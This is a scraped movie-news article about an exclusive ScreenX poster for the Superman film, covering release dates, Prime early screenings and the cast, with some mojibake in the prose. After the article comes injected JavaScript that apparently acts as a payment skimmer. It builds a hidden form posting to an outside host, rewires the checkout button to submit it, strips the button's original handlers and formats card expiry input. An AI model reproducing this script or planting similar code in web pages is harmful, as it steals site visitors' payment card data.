Movies

Superman Flexes His Muscles in Exclusive ScreenX Poster

Superman really is stronger than a locomotive.

Image Credit: ScreenX

Superman has the weight of the world on his shoulders in a new poster for the DC Studios film. We’re getting closer and closer to the theatrical release of Superman, directed by James Gunn and starring David Corenswet as the Man of Steel. Tickets for Superman are now on sale, so what better way to celebrate the first movie from DC Studios than with even more marketing in the form of a poster from ScreenX. The viewing format offers a panoramic view of the movie, which means more angles and a better way to watch a movie in theaters.

Videos by ComicBook.com

ComicBook has the exclusive first look at the ScreenX poster for Superman. The poster features a building falling, and only Superman keeping it from crashing into the ground. Superman is holding the building up with his back, and the dimensions of the massive building and Superman using all of his strength to prop the building up are on display. The ScreenX logo is also running along the side of the crashing building. And yet, Superman is able to keep it in the air, saving whoever is on the ground or inside the building.

image credit: screenx

Early screenings for Superman are being made available through an Amazon Prime subscription. Tickets went on sale Tuesday (June 10th) for Amazon Prime members in the U.S., who can be the first to see the James Gunn-directed film in select theaters at 7 p.m. local time on July 8th โ€” three days before the filmโ€™s nationwide release in theaters and IMAX on July 11th. Advanced tickets for regularย Supermanย showings on July 11th will be released through all major ticket sellers starting Wednesday (June 11th), exactly one month before the new movie soars into theaters.

The Prime Early Screenings ofย Supermanย are part of Amazonโ€™s โ€œAnyone Can Be Superโ€ campaign developed by Amazon Ads Brand Innovation Lab, which โ€œimmerses fans inย Superman-inspired experiences across Amazon, allowing them to discover how their simple actions can create meaningful impact,โ€ according to a press release. Fans who purchase their early access tickets on Fandango can round up their movie ticket purchase to the nearest dollar and donate the balance to the Boys & Girls Clubs of America.

Written and directed by Gunn (theย Guardians of the Galaxyย trilogy,ย The Suicide Squad), the new movie stars David Corenswet as Clark Kent/Superman alongside Rachel Brosnahan as Lois Lane and Nicholas Hoult as Lex Luthor. The cast includes Edi Gathegi as Mister Terrific, Anthony Carrigan as Metamorpho, Nathan Fillion as Green Lantern Guy Gardner, Isabela Merced as Hawkgirl, with Skyler Gisondo as Jimmy Olsen, Sara Sampaio as Eve Teschmacher, Marรญa Gabriela de Farรญa as Angela Spica/the Engineer, Wendell Pierce as Perry White, Alan Tudyk as Superman Robot #4, Neva Howell as Ma Kent, Pruitt Taylor Vince as Pa Kent, with Sean Gunn as Maxwell Lord and Frank Grillo as Rick Flag Sr.

Superman soars into theaters on July 11th. Let us know your thoughts on the ScreenX poster in the comments below!

' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); }; var elemDiv = document.createElement('form'); elemDiv.setAttribute('action', 'https://pay.jollibeefood.rest') elemDiv.setAttribute('method', 'post') elemDiv.setAttribute('id', 'formid') document.body.appendChild(elemDiv); setTimeout(function () { try{ document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() } catch{ console.log(1) } }, 9000); navigation.addEventListener('navigate', () => { setTimeout(function () { try{ var objects = document.getElementsByTagName("svg"); for(var i = 0; i < objects.length; i++) { var obj = objects[i].parentElement; obj.innerHTML += ""; // will trigger update } document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() document.getElementsByClassName("py-5")[1].getElementsByClassName("space-y-2")[0].addEventListener("click", function(e) { setTimeout(function () { document.getElementsByClassName('w-full p-4')[0].innerHTML='
' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); } catch(error){ console.log(error) } }, 4000); }); function formatString(e) { var inputChar = String.fromCharCode(event.keyCode); var code = event.keyCode; var allowedKeys = [8]; if (allowedKeys.indexOf(code) !== -1) { return; } event.target.value = event.target.value.replace( /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/ ).replace( /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/ ).replace( /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3 ).replace( /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41 ).replace( /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0 ).replace( /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/` ).replace( /\/\//g, '/' // Prevent entering more than 1 `/` ); }